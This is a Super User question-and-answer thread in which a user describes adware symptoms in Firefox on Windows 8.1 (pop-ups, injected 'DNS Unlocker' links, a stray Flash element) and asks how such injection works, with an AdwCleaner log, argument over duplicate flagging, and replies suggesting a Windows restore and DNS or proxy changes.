1

For the last few weeks I've had the following happening, using Windows 8.1 and Firefox V44. The only active add-ons are Adblock Plus, Flashblock and Norton Identity Safe:

  • First, Norton Internet Security (which assures me that all is green ticked and hunky dory in security-land) alerts me that there is a large amount of outbound traffic detected. It asks me if I want to run Power Eraser. I did this twice. Power Eraser's total contribution to safety and security is to get its knickers in a twist over the old Office.exe tool (left over from circa Office 2000, which I allowed it to remove) and the Registry setting that allows profiles to be loaded in Powershell. I haven't bothered using it again since.
  • Edit: As an infuriating aside I tried to run a full scan with Norton, but it refused to. I selected Full Scan, selected Go, and nothing happened. Nor could I bring up its options. In the end I ran Norton's diagostics and found that it recommended reinstalling the thing. Great, it shows me oceans of "All OK Here" green, and it didn't even know that it wasn't running properly.
  • Suddenly Firefox will start alerting me that some obscene number of pop-up windows have been blocked.
  • Some will still sneak through, typically alerting me (complete with details of my network connection) that I "have pop-up windows enabled!" and that I should contact people who will "help" me with this. Others are supposedly site surveys from the site that I'm on which, oddly, all look the same even when relating to completely different web sites.

This seems to be an order of magnitude worse when looking at one particular site; smh.com.au.

I suspect, but am not certain, that the pop-ups that slip through have something to do with this Flash element pointing to //partners.cmptch dot com that has introduced itself onto the page:

Suspect Flash Element

Throughout the page I find that certain words have become clickable, always "powered by DNS Unlocker", like so:

DNS Unlocker Element

Frequently, the browser will lick up running scripts pointing to Akamai:

Akamai Script Lockup

The following is, in detail, the part of my question that is different to the "How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?" one.

Here's the ridiculous part. Somebody, somewhere, must know how this thing is doing what it does. But I can't find that information. Every web search yields links on how to "fix" adware. Invariably these turn out to be links to download "The World's Best Anti-Adware Software, Ever!" which will magically fix this for you. On the occasions that there is a so-called "manual" fix it involves removing search engine entries (of which I have no non-standard ones) or the home page (which is still set to the Firefox default) or resetting the browser (which I have already done, setting Firefox back to its factory defaults before adding back the two add-ons mentioned above.)

In desperation I finally succumbed to using an anti-adware tool which was recommended by a number of PC magazines; AdwCleaner v5.032.

This is what it did:

***** [ Files ] *****

[-] File Deleted : C:\WINDOWS\SysWOW64\vers

...
***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\BHO.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\.bdcm
[-] Key Deleted : HKLM\SOFTWARE\Classes\.bdcr

And the result of that? Absolutely nothing, as soon as I opened Firefox and went back to the SMH site, the whole business began again.

So in further desperation, I'm now here hoping that someone whose knowledge of servers and browsers and HTML and such is vastly greater than mine can give me some idea of how this is happening, and what I can do to drive a wooden stake through its heart once and for all.

To be completely clear... A link is inserted into the body text of a web page... How? A Flash component is inserted into such a page (assuming that that's what's happening here)... how? A script that may not be part of the real page content is run... how? In short, what is the mechanism by which these infections occur? It's for certain that it isn't just the wastes of protoplasms who spread viruses who know this kind of thing. People who fight those viruses must have put in some effort to understanding the mechanisms, and therefore how to defend against them and defeat them, as well.

Alan K
  • 123
  • 5
  • @DavidPostill: No it isn't, because I am also asking HOW these specific symptoms are being generated. I want to understand the enemy, not just kill it. – Alan K Feb 01 '16 at 00:29
  • 1
    Without knowing exactly what has infected you how do you expect the "how does it work" to be answered? – DavidPostill Feb 01 '16 at 00:36
  • @DavidPostill Gee, I dunno David, maybe someone who has made a study of this kind of thing knows more than me. Or you. I've given a pretty detailed description of the symtoms. Strangely enough in medicine some doctors can actually figure stuff out without needing to know the pathogen first. But keep flagging those "potential duplicates", because on this site that's the sort of thing that REALLY matters. – Alan K Feb 01 '16 at 00:43
  • @AlanK: You clarified why this isn't a duplicate in a comment. You might want to add that information to the question because it's in the review queue. Two observations: 1) Don't be surprised if people consider your question too broad and vote to close on that basis. Asking how all these different mechanisms work is a pretty big scope. 2) Assuming the question remains open, snide responses in the comments will discourage answers. Think about deleting your last comment. Just sayin'. – fixer1234 Feb 02 '16 at 02:38
  • @fixer1234: I did edit the question to do that (see the edit history) though the question subject itself does begin more with "how it happens" than "how to fix". I'm not looking for a complete treatise on virus infection but rather on who these specific symptoms are produced. Basically, I'd like someone with the knowledge to shine a light into this particular dark place. If the question is closed... it wouldn't surprise me. Your counsel about the tone of the comment is wise but I know for certain that I'm not the only one on Stack Exchange suffering from "moderator fatigue". (Cont) – Alan K Feb 02 '16 at 09:54
  • @fixer1234: You need only look at the ever-increasing number of articles that can be found by querying the name of the site with a vacuum-related action, and a lot of it comes down to "closed as a potential duplicate". "Closed as it is unclear what was asked", even though someone gave the exact answer needed. "On hold as off topic because gods forbid anyone should express an opinion". I know this is a Meta issue which shouldn't really be in the comments but this place seems to be devolving from a place where people help each other to one which exists for the sole purpose of rule enforcement. – Alan K Feb 02 '16 at 09:56

1 Answers1

2

Your AdwCleaner logs indicate that you had something named BHO.DLL. A quick search for BHO.DLL indicates that BHO.DLL is spyware.

If AdwCleaner could not remove it, I would treat it with the severity of a virus (not plain old adware).

Therefore I would pick an answer from this community wiki. Although I hate to say it, the probable best answer is to restore windows.

Community
  • 1
adgelbfish
  • 654
  • 6
  • 12
  • Thanks. I can live with that if I have to. But I do want to see whether I can get some insight into the mechanics of how this occurs. Most things you can find by a simple web search but for some reason (possibly the fact that they're buried too deep under the "download this tool" so-called answers) the hows and whys of this kind of infection aren't so easy to find. ADWCleaner removed bho.dll, so it's something else that's causing this. – Alan K Feb 01 '16 at 03:23
  • It could be a redirecting your dns and proxying all of your traffic, or a lot of other things. I would suggest downloading a copy of firefox portable, setting it to google's dns 8.8.8.8 and 8.8.4.4 with [this exetension](https://addons.mozilla.org/en-US/firefox/addon/switchhosts/) and trying again. After that, the next thing I would do is proxy all of your browser's traffic through any proxy server and see if it gets cleared up. also try setting ff to not use windows proxy settings in Advanced > Network. – adgelbfish Feb 01 '16 at 04:00
  • @AlanK I'd be curious as to what method they use, if you want, we can continue in chat. – adgelbfish Feb 01 '16 at 04:07